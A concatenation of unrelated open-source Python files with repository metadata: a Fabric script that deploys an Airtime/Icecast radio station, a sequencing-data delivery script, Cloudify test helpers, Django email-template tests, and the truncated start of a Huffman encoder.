"bytes": "990"
},
{
"name": "Shell",
"bytes": "3743"
},
{
"name": "XSLT",
"bytes": "157892"
}
],
"symlink_target": ""
} |
"""
RadioX
Copyright 2012 - Rob Cakebread <cakebread@gmail.com>
License: BSD
git://github.com/cakebread/radiox.git
RadioX is an internet radio station broadcasting Icecast2 or Shoutcast.
The goal of the RadioX project is to make an easily deployable, fully
featured internet radio station with live on-air conferencing requiring
no special hardware - callers dial in with regular phones.
The public facing website for displaying show schedules and what
is currently being played is powered by Django, Mezzanine and
Bootstrap for a modern look and feel in browsers and on phones.
Airtime can be used for the web interface to schedule shows by DJs and
station managers. If you don't need scheduling, RadioX can be controlled by
any mpd client. This allows DJing from phones without needing to worry
about dropped connections. The media is stored on the RadioX server.
Liquidsoap is an audio programming language developed
to mix audio sources and stream to an Icecast or Shoutcast server.
RadioX can be put into request mode where listeners cand send SMS
text messages or Jabber IMs to search for and request songs.
RadioX will act as a SIP endpoint or Google Voice endpoint and uses Twilio
for conference calls and purchasing phone numbers.
This is a Cuisine Fabric file. It will take a freshly installed
Ubuntu 12.04 LTS box and turn it into an Icecast radio station.
The scheduling is controlled by the powerful Airtime software.
The backend and most of the scripting is in Python. For the public facing
website, Django is used to show schedules.
To get a fully functioning radio station streaming on port 9999 on
your local Linux box using Vagrant:
Put this fab file inside a Python virtualenv, then:
$ vagrant up
$ fab vagrant setup
A few sample songs are in the library and your radio station is now
streaming music!
Accessing the Radio Station running in the Vagrant VirtualBox:
Stream:
http://localhost:9999/airtime_128
(Icecast2 URL for phones, media players etc.)
Airtime Admin Web Interface for Djs :
http://localhost:9080 (Airtime admin interface)
"""
from cuisine import *
from fabric.api import *
#############################################################################
# Define your deployment hosts here
#############################################################################
def vagrant():
    """Use Vagrant VirtualBox as host.

    Reads the private-key path from ``vagrant ssh-config`` output
    (a line of the form ``IdentityFile /path/to/key``).
    """
    env.user = 'vagrant'
    env.hosts = ['127.0.0.1:2222']
    result = local('vagrant ssh-config | grep IdentityFile', capture=True)
    # BUG FIX: str.lstrip('IdentityFile') strips a *character set*, not the
    # prefix, and could eat leading letters of the path. Split off the
    # keyword instead and keep everything after the first whitespace run.
    env.key_filename = result.split(None, 1)[1].strip()
def production():
    """Define your production host(s) you want to deploy to.

    Sets Fabric's ``env.user``/``env.hosts``; subsequent run()/sudo()
    calls target these hosts.
    """
    #WARNING:
    #
    # ** This has only been tested with Vagrant / VirtualBox **
    #
    # ** Don't use on existing production sites unless you're familiar **
    # ** with what the Airtime .deb does to your Apache config! **
    # ** TODO: Don't use Airtime .deb, use nginx, no apache2 **
    #
    # Use on a fresh installation of Ubuntu 12.04 LTS
    # (Airtime's .deb will clobber your existing Apache config)
    env.user = 'pollard'
    env.hosts = ['gbvdb.com', 'i-am-a-scientist.com']
#############################################################################
# Deployment functions
#############################################################################
def install_airtime():
    '''Install Airtime .deb'''
    # Fetch the easy-setup package, then install it and Airtime proper.
    run('wget http://apt.sourcefabric.org/misc/airtime-easy-setup.deb')
    for command in ('dpkg -i ./airtime-easy-setup.deb',
                    'apt-get update',
                    'apt-get --yes install airtime'):
        sudo(command)
def install_pg_utf8():
    """Install PostgreSQL 9.1 and friends under a UTF-8 locale so the
    cluster is initialised with UTF-8 encoding."""
    pg_packages = (
        'libossp-uuid16',
        'postgresql',
        'postgresql-client-9.1',
        'postgresql-9.1',
        'postgresql-contrib-9.1',
    )
    with prefix('export LC_ALL=en_US.UTF-8'):
        for package in pg_packages:
            sudo('apt-get --yes install ' + package)
def setup_locale():
    '''Set UTF-8 locale'''
    # Register en_US.UTF-8 as a supported locale, export it in every
    # bash session, and make it the system default.
    sudo('echo "en_US.UTF-8 UTF-8" > /var/lib/locales/supported.d/local')
    sudo('echo "############################" >> /etc/bash.bashrc')
    # NOTE(review): echo without -e writes the literal characters "\n"
    # here rather than a newline -- confirm this is intended.
    sudo('echo "#Added by RadioX for sanity:\n" >> /etc/bash.bashrc')
    sudo('echo "LANGUAGE=en_US.UTF-8" >> /etc/bash.bashrc')
    sudo('echo "LANG=en_US.UTF-8" >> /etc/bash.bashrc')
    sudo('echo "LC_ALL=en_US.UTF-8" >> /etc/bash.bashrc')
    # /etc/default/locale is overwritten (">") then appended to (">>").
    sudo('echo "LC_ALL=en_US.UTF-8" > /etc/default/locale')
    sudo('echo "LANG=en_US.UTF-8" >> /etc/default/locale')
    sudo('locale-gen en_US.UTF-8')
    sudo('dpkg-reconfigure locales')
def upgrade():
    """Refresh the package lists and upgrade all installed packages."""
    for command in ('apt-get update', 'apt-get --yes upgrade'):
        sudo(command)
def setup():
    '''Deploy basic packages'''
    # Ensure postgresql database encoding is UTF-8
    setup_locale()
    upgrade()
    install_pg_utf8()
    # Package groups: server infrastructure, developer tools, Python
    # toolchain, and everything Airtime/Icecast/Liquidsoap needs.
    server = ['pgbouncer', 'supervisor']
    dev = ['tmux', 'vim', 'git-core', 'build-essential', 'gettext',
        'apache2-utils', 'phppgadmin']
    py = ['python2.7', 'python2.7-dev', 'python-setuptools', 'python-pip',
        'python-dev', 'python-virtualenv']
    airtime = ['apache2', 'apache2-mpm-prefork',
        'apache2.2-bin', 'apache2.2-common', 'autoconf',
        'automake', 'autotools-dev', 'binutils', 'cpp', 'cpp-4.6', 'curl',
        'debconf-utils', 'ecasound', 'erlang-asn1', 'erlang-base',
        'erlang-corba', 'erlang-crypto', 'erlang-dev', 'erlang-diameter',
        'erlang-docbuilder', 'erlang-edoc', 'erlang-erl-docgen',
        'erlang-eunit', 'erlang-ic', 'erlang-inets', 'erlang-inviso',
        'erlang-mnesia', 'erlang-nox', 'erlang-odbc', 'erlang-os-mon',
        'erlang-parsetools', 'erlang-percept', 'erlang-public-key',
        'erlang-runtime-tools', 'erlang-snmp', 'erlang-ssh', 'erlang-ssl',
        'erlang-syntax-tools', 'erlang-tools', 'erlang-webtool',
        'erlang-xmerl', 'esound-common', 'faad', 'fontconfig-config',
        'freepats', 'gcc', 'gcc-4.6', 'icecast2', 'lame', 'libao-common',
        'libao-ocaml', 'libao4', 'libapache2-mod-php5', 'libapr1',
        'libaprutil1', 'libaprutil1-dbd-sqlite3', 'libaprutil1-ldap',
        'libasound2', 'libasyncns0', 'libaudio2', 'libaudiofile1',
        'libc-dev-bin', 'libc6-dev', 'libcamomile-ocaml-data', 'libesd0',
        'libfaad2', 'libflac8', 'libfontconfig1', 'libgd2-xpm', 'libgomp1',
        'libice6', 'libjack-jackd2-0', 'libjpeg-turbo8', 'libjpeg8',
        'libjson0', 'libkvutils4', 'liblo7', 'libltdl-dev', 'libltdl7',
        'libmad-ocaml', 'libmad0', 'libmikmod2', 'libmp3lame0', 'libmpc2',
        'libmpfr4', 'libmpg123-0', 'libodbc1', 'libogg0', 'liboil0.3',
        'libportaudio2', 'libpq5', 'libpulse0', 'libquadmath0',
        'libsamplerate0', 'libsctp1', 'libsm6', 'libsndfile1',
        'libsoundtouch-ocaml', 'libsoundtouch0', 'libspeex1', 'libssl-dev',
        'libssl-doc', 'libt1-5', 'libtag1-vanilla', 'libtag1c2a',
        'libtaglib-ocaml', 'libtheora0', 'libtool', 'libvorbis0a',
        'libvorbisenc2', 'libvorbisfile3', 'libx11-6', 'libx11-data',
        'libxaw7', 'libxext6', 'libxmu6', 'libxpm4', 'libxslt1.1', 'libxt6',
        'linux-libc-dev', 'lksctp-tools', 'm4', 'manpages-dev', 'mikmod',
        'monit', 'mpg123', 'multitail', 'ocaml-base-nox', 'odbc-postgresql',
        'odbcinst', 'odbcinst1debian2', 'oss-compat', 'php-pear', 'php5-cli',
        'php5-common', 'php5-curl', 'php5-dev', 'php5-gd', 'php5-pgsql',
        'rabbitmq-server', 'shtool', 'ssl-cert', 'timidity', 'unzip',
        'timidity-daemon', 'ttf-dejavu-core', 'vorbis-tools',
        'x11-common', 'zlib1g-dev']
    # cuisine.package_ensure installs each package only when missing.
    for pkg in server + dev + py + airtime:
        package_ensure(pkg)
    sudo('pip install virtualenvwrapper')
    install_airtime()
    add_songs()
    update_liquidsoap_script()
    print("You can listen to the stream with: mplayer http://localhost:9999/airtime_128")
    print("The Airtime web interface: at: http://localhost:9080")
    print("Public facing web interface coming soon in Django.")
def update_liquidsoap_script():
    """Replace default Airtime liquidsoap script with RadioX"""
    # Local path of the RadioX liquidsoap script (relative to the fabfile).
    radiox = 'liquidsoap/ls_script.liq'
    # cuisine.file_upload(remote_path, local_path, ...): push our script
    # over Airtime's stock one. NOTE(review): sudo='pypo' presumably makes
    # the upload run as the pypo user -- confirm cuisine's semantics.
    file_upload(
        '/usr/lib/airtime/pypo/bin/liquidsoap_scripts/ls_script.liq',
        radiox,
        sudo='pypo')
    sudo('service airtime-liquidsoap restart')
def add_songs():
    """Download a handful of sample MP3s and import them into Airtime."""
    song_urls = (
        'http://www.robertpollard.net/sounds/tabbyandlucy.mp3',
        'http://www.robertpollard.net/sounds/Come%20On%20Baby%20Grace.mp3',
        'http://www.robertpollard.net/sounds/questiongirlallright.mp3',
        'http://www.robertpollard.net/sounds/jimmy.mp3',
        'http://www.robertpollard.net/sounds/imaginaryqueenanne.mp3',
        'http://www.robertpollard.net/sounds/loveyourspaceman.mp3',
    )
    sudo('mkdir tmp')
    with cd('tmp'):
        for url in song_urls:
            sudo('wget -q ' + url)
        sudo('airtime-import -m ./*mp3')
def install_mezzanine_dev():
    """Install local copy of Mezzanine for developer

    Mezzanine isn't deployed on the vagrant box when Airtime is deployed.
    The developer will want to modify the Django site locally then deploy.
    The Django front-end is not required to stream music,
    it's purely informational, public-facing. You can reach
    it at http://localhost:8000/
    """
    # All commands run on the *local* machine (fabric local/lcd).
    local('pip install -r requires.txt')
    local('mezzanine-project radiox')
    with lcd('radiox'):
        local('python manage.py createdb')
        # Blocks in the foreground serving the dev site.
        local('python manage.py runserver')
#############################################################################
#Use these functions to diagnose problems. They are non-destructive.
#############################################################################
def show_sudo_locale():
    """Print the locale seen under sudo (diagnostic, non-destructive)."""
    sudo('locale')


def show_pg_locale():
    """Print the locale seen by the postgres user."""
    sudo('sudo -u postgres locale')


def show_pg_encoding():
    """Print the server-side encoding of the PostgreSQL cluster."""
    sudo('sudo -u postgres psql -c "SHOW SERVER_ENCODING"')


def show_airtime_status():
    """Print the airtime-media-monitor service status and the status URL."""
    sudo('service airtime-media-monitor status')
    print('After port forwarding:')
    print('AIRTIME_STATUS_URL = http://localhost:9080/api/status/format/json/api_key/%%api_key%%')
| {
"content_hash": "ad978907622f236c14de122665be1825",
"timestamp": "",
"source": "github",
"line_count": 264,
"max_line_length": 98,
"avg_line_length": 39.59848484848485,
"alnum_prop": 0.6176583126076143,
"repo_name": "cakebread/radiox",
"id": "c12cf3871ff74505d28267d398e0600f040a581c",
"size": "10454",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "fabfile.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Ruby",
"bytes": "704"
}
],
"symlink_target": ""
} |
import sys, os, yaml, glob, shutil
from datetime import datetime
def fixProjName(pname):
    """Normalize a project id: capitalize the first letter and the first
    letter after every period, leaving all other characters untouched.

    Examples: "j.doe" -> "J.Doe", "aBc" -> "ABc", "a..b" -> "A..B".
    Empty input returns "" (the old char-by-char loop raised IndexError).
    """
    return ".".join(
        part[0].upper() + part[1:] if part else part
        for part in pname.split(".")
    )
# ---- CLI argument handling and run-wide configuration (Python 2 script) ----
if len(sys.argv) < 5:
    print "USAGE: python " + sys.argv[0] + " <project ID> <run name> <UPPMAX project> <Dry run, y/n>"
    sys.exit(0)
base_path = '/proj/a2010002/nobackup/illumina/'  # where run folders live
base_yaml_path = '/proj/a2010002/archive/'  # where run_info.yaml lives
# base_yaml_path = '/bubo/home/h9/mikaelh/'
dry = True
projid = sys.argv[1].lower()
runname = sys.argv[2].strip("/")
# Abbreviated run name built from underscore-fields 0 and 3 of the run name.
abbr_runname = runname.split("_")[0] + "_" + runname.split("_")[3]
yamlfile = base_yaml_path + runname + "/run_info.yaml"
uppmaxproj = sys.argv[3]
# print "Project name: ", fixProjName(projid)
if sys.argv[4].lower() == "n": dry = False
# NOTE(review): yaml.load without a safe loader executes arbitrary YAML
# tags; the file comes from the local archive, but safe_load would do.
projdata = yaml.load(open(yamlfile))
dt = datetime.now()
time_str = str(dt.year) + "_" + str(dt.month) + "_" + str(dt.day) + "_" + str(dt.hour) + "_" + str(dt.minute) + "_" + str(dt.second)
if not dry:
    # Real runs are logged under a timestamped file.
    logfilename = "/bubo/home/h9/mikaelh/delivery_logs/" + time_str + ".log"
    logfile = open(logfilename, "w")
print "Project to move files for:", projid
if not dry: logfile.write("Project to move files for:" + "\n" + fixProjName(projid) + "\n")
# Collect the lanes belonging to this project; remember every project id
# seen so the possibilities can be listed when nothing matches.
matching = set()
available = set()
for entry in projdata:
    available.add(entry['description'].split(',')[-1].strip())
    if entry['description'].split(',')[-1].strip().lower()==projid:
        matching.add(entry['lane'])
    elif entry.has_key('multiplex'):
        # Multiplexed lanes: a sample-level project may match instead.
        for sample in entry['multiplex']:
            if sample.has_key('sample_prj'):
                available.add(sample['sample_prj'])
                if sample['sample_prj'].split(',')[-1].strip().lower()==projid:
                    matching.add(entry['lane'])
if len(matching)==0:
    print "No matching project found. Possibilities:"
    for prid in sorted(available):
        print prid
    sys.exit(0)
elif dry:
    print "I will move files from lanes " + ",".join(matching)
if not dry: logfile.flush()
# Create directory in user's INBOX
temp = runname.split('_')
start_date = temp[0]
flow_cell = temp[3][0] # A or B
created_proj_dir_name = fixProjName(projid)
created_run_dir_name = "20" + start_date + flow_cell + "_hiseq2000"
# "Old school" style
#del_path = '/proj/' + uppmaxproj + "/INBOX/" + created_proj_dir_name + "/" + created_run_dir_name
# New
del_path_top = '/proj/' + uppmaxproj + "/INBOX/" + created_proj_dir_name
print "Will create a top-level project directory", del_path_top
if not dry:
    # Directories are only created on real (non-dry) runs.
    logfile.write("Creating top-level delivery directory:" + del_path_top + " (or leaving it in place if already present)\n")
    if os.path.exists(del_path_top):
        print "Directory", del_path_top, " already exists!"
    else:
        try:
            os.mkdir(del_path_top)
        except:
            print "Could not create delivery directory!"
            sys.exit(0)
del_path = del_path_top + "/" + abbr_runname
print "Will create a run directory", del_path
if not dry:
    logfile.write("Creating run-level delivery directory:" + del_path + " (or leaving it in place if already present)\n")
    if os.path.exists(del_path):
        print "Directory", del_path, " already exists!"
    else:
        try:
            os.mkdir(del_path)
        except:
            print "Could not create delivery directory!"
            sys.exit(0)
# Start looking for the files to transfer
temp = runname.split('_')
dirs_to_process = []
for m in sorted(matching):
    # One "<lane>_<date>_<flowcell>_nophix" directory per matched lane.
    d = m + "_" + temp[0] + "_" + temp[3] + "_nophix"
    dirs_to_process.append(d)
os.chdir(base_path + runname )
for d in dirs_to_process:
    #dirpath = d + "_barcode/2_mismatch"
    dirpath = d + "_barcode"
    if not os.path.exists(dirpath):
        print "Could not find directory", dirpath
        print "Standing in ", os.getcwd()
        sys.exit(0)
    os.chdir(dirpath)
    # Barcode metrics file: two historical naming conventions are tried.
    bcname = d + "_bc.metrics"
    if not os.path.exists(bcname):
        bcname = d + ".bc_metrics"
    lane = dirpath[0]
    print "LANE ", lane
    if not dry: logfile.write("LANE " + lane + "\n")
    # Print table of Illumina vs. bcbb barcodes
    sample_id_and_idx = {}
    lane_info = "none"
    # The 'main_proj_for_lane' stuff is outdated since March 2012
    # main_proj_for_lane = ''
    for entry in projdata:
        if entry['lane'] == lane:
            lane_info = entry
            # is_main_proj = True
            # main_proj_for_lane = entry['description'].split(',')[-1].strip().lower()
            # if main_proj_for_lane == projid:
            #     print projid, "is the main project for lane", lane
            # else:
            #     print "This project is not the main project for lane ", lane, ". The main project is ", main_proj_for_lane
            #     is_main_proj = False
    lane_sample = ''
    if lane_info.has_key('multiplex'):
        # Map bcbb barcode ids to customer sample names for this project.
        for bc in lane_info['multiplex']:
            if bc.has_key('sample_prj'):
                if bc['sample_prj'].split(',')[-1].strip().lower() == projid:
                    sample_id_and_idx[bc['barcode_id']] = bc['name']
        # elif is_main_proj:
        #     sample_id_and_idx[bc['barcode_id']] = bc['name']
        print "Pipeline index\tSampleName\t# matching sequences"
        if not dry: logfile.write("Pipeline index\tIllumina index/sample ID\tMatches\n")
        if os.path.exists(bcname):
            for line in open(bcname):
                [bcbb_bc, hits] = line.strip().split()
                try:
                    if sample_id_and_idx.has_key(int(bcbb_bc)):
                        print bcbb_bc + "\t" + sample_id_and_idx[int(bcbb_bc)] + "\t" + hits
                        if not dry: logfile.write(bcbb_bc + "\t" + sample_id_and_idx[int(bcbb_bc)] + "\t" + hits + "\n")
                except:
                    # int() fails for the literal "unmatched" row; anything
                    # else is a genuine parsing problem.
                    if bcbb_bc == "unmatched":
                        print bcbb_bc + "\t" + "N.A." + "\t" + hits
                        if not dry: logfile.write(bcbb_bc + "\t" + "N.A." + "\t" + hits + "\n")
                    else:
                        print "Encountered parsing error in barcode conversion: " + bcbb_bc
                        print sample_id_and_idx
                        sys.exit(0)
        else:
            print "BC metrics file", bcname, " not found"
            sys.exit(0)
    else:
        print "Non-multiplexed lane"
        print "Please type a sample name for this lane"
        lane_sample = raw_input()
        if not dry: logfile.write("Non-multiplexed lane\n")
    # print os.listdir(".")
    files_to_copy = []
    for fastq_file in (glob.glob("*fastq.txt") + glob.glob("*fastq.txt.gz")):
        # Skip if this is a non-compressed file and there exists a compressed version
        if os.path.exists(fastq_file + ".gz"):
            continue
        ext = ""
        if os.path.splitext(fastq_file)[1] == ".gz":
            ext = os.path.splitext(fastq_file)[1]
        if lane_info.has_key('multiplex'):
            new_file_name = ''
            if 'unmatched' in fastq_file: continue
            # Extract barcode
            # NOTE(review): this rebinds `lane` (and `name`) from the outer
            # scope -- harmless for the remaining statements, but fragile.
            [lane, date, run_id, nophix, bcbb_bc, pe_read, dummy] = fastq_file.split("_")
            #[lane, date, run_id, bcbb_bc, pe_read, dummy] = fastq_file.split("_")
            if sample_id_and_idx.has_key(int(bcbb_bc)):
                customer_sample_id = sample_id_and_idx[int(bcbb_bc)]
                new_file_name = lane + "_" + date + "_" + run_id + "_" + customer_sample_id.replace("/", "_") + "_" + pe_read + ".fastq" + ext
        else:
            [lane, date, run_id, nophix, name, pe_read,dummy] = fastq_file.split("_")
            #[lane, date, run_id, name, pe_read,dummy] = fastq_file.split("_")
            new_file_name = lane + "_" + date + "_" + run_id + "_" + lane_sample + "_" + pe_read + ".fastq" + ext
        # print "Preparing to copy file", fastq_file, "as ", new_file_name
        if new_file_name != '': files_to_copy.append([fastq_file, new_file_name])
    for pair in files_to_copy:
        source = os.getcwd() + "/" + pair[0]
        dest = del_path + "/" + pair[1]
        print "Will copy (rsync) ", source, "to ", dest
        if not dry:
            command_to_execute = 'rsync -ac ' + source + ' ' + dest
            logfile.write("Executing command: " + command_to_execute + "\n")
            logfile.flush()
            os.system(command_to_execute)
    os.chdir('..')
    #os.chdir('../..')
if not dry:
    # Make the delivered files group-writable and close the log.
    os.chdir(del_path)
    logfile.close()
    os.system("chmod -R g+rw " + del_path)
| {
"content_hash": "4fcf2350c1e90a18b7990cee0ea823e7",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 144,
"avg_line_length": 37.371308016877634,
"alnum_prop": 0.5502991983741673,
"repo_name": "kate-v-stepanova/scilifelab",
"id": "ed33692156b57f4b61d73316c28ff121294125ac",
"size": "8979",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scripts/assisted_delivery.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "3192"
},
{
"name": "Mako",
"bytes": "13990"
},
{
"name": "Python",
"bytes": "1317628"
},
{
"name": "R",
"bytes": "4089"
},
{
"name": "Shell",
"bytes": "38653"
}
],
"symlink_target": ""
} |
import json
import os
from cloudify.context import BootstrapContext
from cloudify.mocks import MockCloudifyContext
# Retry delay (seconds) used by the tests in this module.
RETRY_AFTER = 1
# Time during which no retry could possibly happen.
NO_POSSIBLE_RETRY_TIME = RETRY_AFTER / 2.0
# Bootstrap-context variants that should all behave as "no resources prefix":
# key absent, empty string, and explicit None.
BOOTSTRAP_CONTEXTS_WITHOUT_PREFIX = (
    {
    },
    {
        'resources_prefix': ''
    },
    {
        'resources_prefix': None
    },
)
def set_mock_provider_context(ctx, provider_context):
    """Stub out ``ctx.get_provider_context`` so that it always returns
    *provider_context*, ignoring the provider name it is called with."""
    ctx.get_provider_context = lambda _provider_name_unused: provider_context
def create_mock_ctx_with_provider_info(*args, **kw):
    """Build a ``MockCloudifyContext``, pre-loading the provider context
    stored in ``provider-context.json`` next to this module.

    Extra positional/keyword arguments are forwarded to the mock context;
    ``provider_context`` and ``bootstrap_context`` are filled in here.
    """
    here = os.path.dirname(os.path.realpath(__file__))
    with open(os.path.join(here, 'provider-context.json')) as src:
        provider_context = json.load(src)['context']
    kw['provider_context'] = provider_context
    kw['bootstrap_context'] = BootstrapContext(provider_context['cloudify'])
    return MockCloudifyContext(*args, **kw)
| {
"content_hash": "0487a192f3eb0e80b3a0815b168c270d",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 76,
"avg_line_length": 25.325,
"alnum_prop": 0.684106614017769,
"repo_name": "GigaSpaces-ProfessionalServices/cloudify-openstack-plugin",
"id": "13099292cac9bd119db4c4d68d73c64f1b1b1878",
"size": "1013",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "openstack_plugin_common/tests/test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "1033"
},
{
"name": "Python",
"bytes": "229465"
}
],
"symlink_target": ""
} |
from django.core.exceptions import ImproperlyConfigured
from django.core.mail import EmailMessage
from django.template import TemplateDoesNotExist
from django.test import TestCase
from mail_utils import TemplateMixin
class TemplatelessMessage(TemplateMixin, EmailMessage):
    # template_name is deliberately unset: instantiating this class must
    # raise ImproperlyConfigured (exercised in TemplateMixinTestCase).
    template_name = None
class Message(TemplateMixin, EmailMessage):
    # Default rendering context and template shared by the tests below;
    # both can be overridden per-instance via constructor kwargs.
    template_context = {'reason': 'Test', 'sender': 'Dima Kurguzov'}
    template_name = 'email.html'
class TemplateMixinTestCase(TestCase):
    """Behaviour of TemplateMixin: template lookup, content subtype
    selection and template-context merging."""

    def test_exception_when_template_name_is_not_set(self):
        with self.assertRaises(ImproperlyConfigured):
            TemplatelessMessage()

    def test_exception_when_template_does_not_exist(self):
        with self.assertRaises(TemplateDoesNotExist):
            Message(template_name='does_not_exist')

    def test_content_subtype_is_plain_by_default(self):
        msg = Message(template_name='email.txt')
        self.assertEqual('plain', msg.content_subtype)

    def test_content_subtype_is_html_when_template_name_ends_with_html(self):
        # BUG FIX: this method was named 'text_...' instead of 'test_...',
        # so the unittest runner never collected or executed it.
        msg = Message(template_name='email.html')
        self.assertEqual('html', msg.content_subtype)

    def test_use_passed_template_name_parameter(self):
        msg = Message(template_name='email.txt')
        self.assertEqual('email.txt', msg.template_name)

    def test_use_passed_body_parameter_instead_of_template(self):
        self.assertEqual('New message', Message(body='New message').body)

    def test_use_template_when_body_parameter_is_not_passed(self):
        self.assertIn('We are glad', Message(template_name='email.html').body)

    def test_update_template_context_with_passed_parameter(self):
        # Passed context is merged on top of the class-level defaults.
        context = {'recipient': 'John Smith', 'sender': 'Dima Kurguzov'}
        msg = Message(template_context=context)
        self.assertEqual('Test', msg.template_context['reason'])
        self.assertEqual('Dima Kurguzov', msg.template_context['sender'])
        self.assertEqual('John Smith', msg.template_context['recipient'])

    def test_use_template_context_to(self):
        # Context values end up rendered into the message body.
        context = {'recipient': 'John Smith', 'sender': 'Dima Kurguzov'}
        msg = Message(template_context=context)
        self.assertIn('John Smith', msg.body)
        self.assertIn('Dima Kurguzov', msg.body)

    def test_instance_does_not_override_original_context(self):
        # Passing template_context must not mutate the class-level dict.
        original = Message.template_context
        instance = Message(template_context={'extra': 'value'})
        self.assertNotEqual(original, instance.template_context)
import warnings
from mail_utils import TemplateMessageMixin
class OldMessage(TemplateMessageMixin, EmailMessage):
    # Built on TemplateMessageMixin, the deprecated mixin name; this file's
    # TemplateMessageMixinTestCase expects instantiation to emit a warning.
    template_name = 'email.html'
class TemplateMessageMixinTestCase(TestCase):
    """The deprecated TemplateMessageMixin must warn on instantiation."""

    def test_warning(self):
        # BUG FIX: simplefilter('always') was previously called *outside*
        # catch_warnings, permanently mutating the process-wide warning
        # filters and leaking into every other test.  Calling it inside the
        # context keeps the change scoped: catch_warnings restores the
        # original filters on exit.
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter('always')
            OldMessage()
            self.assertEqual(1, len(w))
| {
"content_hash": "3504448207bd5d3d3d27e370f58ec16a",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 78,
"avg_line_length": 37.36363636363637,
"alnum_prop": 0.7031630170316302,
"repo_name": "koorgoo/django-mail-utils",
"id": "6475f32e7c243247e3cb2799dd21197eb479ee5a",
"size": "2877",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_template_mixin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "145"
},
{
"name": "Python",
"bytes": "11337"
}
],
"symlink_target": ""
} |
import os
import marshal
import cPickle
import array
class HuffmanNode(object):
    """A node of the Huffman tree.

    Attributes: L/R are the child nodes, p the parent, c the character
    (None for internal nodes) and fq the accumulated frequency.
    """
    # When True, __repr__ prints the whole subtree recursively,
    # rendering missing children as '#'.
    recurPrint = False

    def __init__(self, ch=None, fq=None, lnode=None, rnode=None, parent=None):
        self.L = lnode
        self.R = rnode
        self.p = parent
        self.c = ch
        self.fq = fq

    def __repr__(self):
        label = '(%s:%d)' % (self.c, self.fq)
        if not HuffmanNode.recurPrint:
            return label
        left = str(self.L) if self.L else '#'
        right = str(self.R) if self.R else '#'
        return label + left + right

    def __cmp__(self, other):
        # Python-2-only ordering hook: nodes sort by frequency.
        if not isinstance(other, HuffmanNode):
            return super(HuffmanNode, self).__cmp__(other)
        return cmp(self.fq, other.fq)
def _pop_first_two_nodes(nodes):
if len(nodes)>1:
first=nodes.pop(0)
second=nodes.pop(0)
return first, second
else:
#print "[popFirstTwoNodes] nodes's length <= 1"
return nodes[0], None
def _build_tree(nodes):
    """Build the Huffman tree in place and return its root node.

    Repeatedly merges the two lowest-frequency nodes into a fresh parent
    until a single node (the root) remains.  *nodes* is consumed.
    """
    nodes.sort()
    while True:
        lo, hi = _pop_first_two_nodes(nodes)
        if hi is None:
            # Only one node left: that is the root.
            return lo
        merged = HuffmanNode(lnode=lo, rnode=hi, fq=lo.fq + hi.fq)
        lo.p = merged
        hi.p = merged
        nodes.insert(0, merged)
        nodes.sort()
def _gen_huffman_code(node, dict_codes, buffer_stack=[]):
if not node.L and not node.R:
dict_codes[node.c] = ''.join(buffer_stack)
return
buffer_stack.append('0')
_gen_huffman_code(node.L, dict_codes, buffer_stack)
buffer_stack.pop()
buffer_stack.append('1')
_gen_huffman_code(node.R, dict_codes, buffer_stack)
buffer_stack.pop()
def _cal_freq(long_str):
from collections import defaultdict
d = defaultdict(int)
for c in long_str:
d[c] += 1
return d
MAX_BITS = 8  # number of bits packed into each byte of the encoded stream
class Encoder(object):
    """Huffman encoder.

    Assigning the ``long_str`` property (directly, via the constructor, or
    via :meth:`encode`) builds the Huffman tree, the per-character code
    map, and the packed byte stream.  :meth:`write` serialises the result.
    """

    def __init__(self, filename_or_long_str=None):
        # If the argument names an existing file, compress its contents;
        # otherwise treat the argument itself as the text to compress.
        if filename_or_long_str:
            if os.path.exists(filename_or_long_str):
                self.encode(filename_or_long_str)
            else:
                self.long_str = filename_or_long_str

    def __get_long_str(self):
        return self._long_str

    def __set_long_str(self, s):
        # Setting the text eagerly rebuilds the tree, the char->bit-string
        # map, and the packed codes (skipped for empty/None input).
        self._long_str = s
        if s:
            self.root = self._get_tree_root()
            self.code_map = self._get_code_map()
            self.array_codes, self.code_length = self._encode()

    # Reading returns the raw text; writing re-encodes it (see above).
    long_str = property(__get_long_str, __set_long_str)

    def _get_tree_root(self):
        """Build and return the Huffman tree for the current text."""
        freq = _cal_freq(self.long_str)
        # .items() instead of the Python-2-only .iteritems(): behaviour is
        # identical here and keeps the method 2/3-compatible.
        return _build_tree(
            [HuffmanNode(ch=ch, fq=int(fq)) for ch, fq in freq.items()]
        )

    def _get_code_map(self):
        """Return the {char: bit-string} code table for the current tree."""
        codes = {}
        _gen_huffman_code(self.root, codes)
        return codes

    def _encode(self):
        """Pack the coded bits into bytes.

        Returns ``(array_codes, code_length)`` where *array_codes* is an
        ``array('B')`` of packed bytes and *code_length* is the total
        number of meaningful bits (the final byte may be padded).
        """
        array_codes = array.array('B')
        code_length = 0
        buff, length = 0, 0
        for ch in self.long_str:
            code = self.code_map[ch]
            for bit in code:
                # Shift the pending bits left and append the new bit.
                if bit == '1':
                    buff = (buff << 1) | 0x01
                else:  # bit == '0'
                    buff = buff << 1
                length += 1
                if length == MAX_BITS:
                    # A full byte is ready; flush it.
                    array_codes.append(buff)
                    buff, length = 0, 0
            code_length += len(code)
        if length != 0:
            # Left-align the remaining bits in the final, partial byte.
            array_codes.append(buff << (MAX_BITS - length))
        return array_codes, code_length

    def encode(self, filename):
        """Read *filename* (binary) and compress its contents."""
        fp = open(filename, 'rb')
        try:
            self.long_str = fp.read()
        finally:
            # BUG FIX: the handle previously leaked if (re)encoding raised.
            fp.close()

    def write(self, filename):
        """Serialise (pickled tree, bit count, packed bytes) to *filename*."""
        # BUG FIX: the old check `if self._long_str:` raised AttributeError
        # when no text had ever been assigned; getattr preserves the
        # intended friendly message instead.
        if getattr(self, '_long_str', None):
            fcompressed = open(filename, 'wb')
            try:
                marshal.dump(
                    (cPickle.dumps(self.root), self.code_length, self.array_codes),
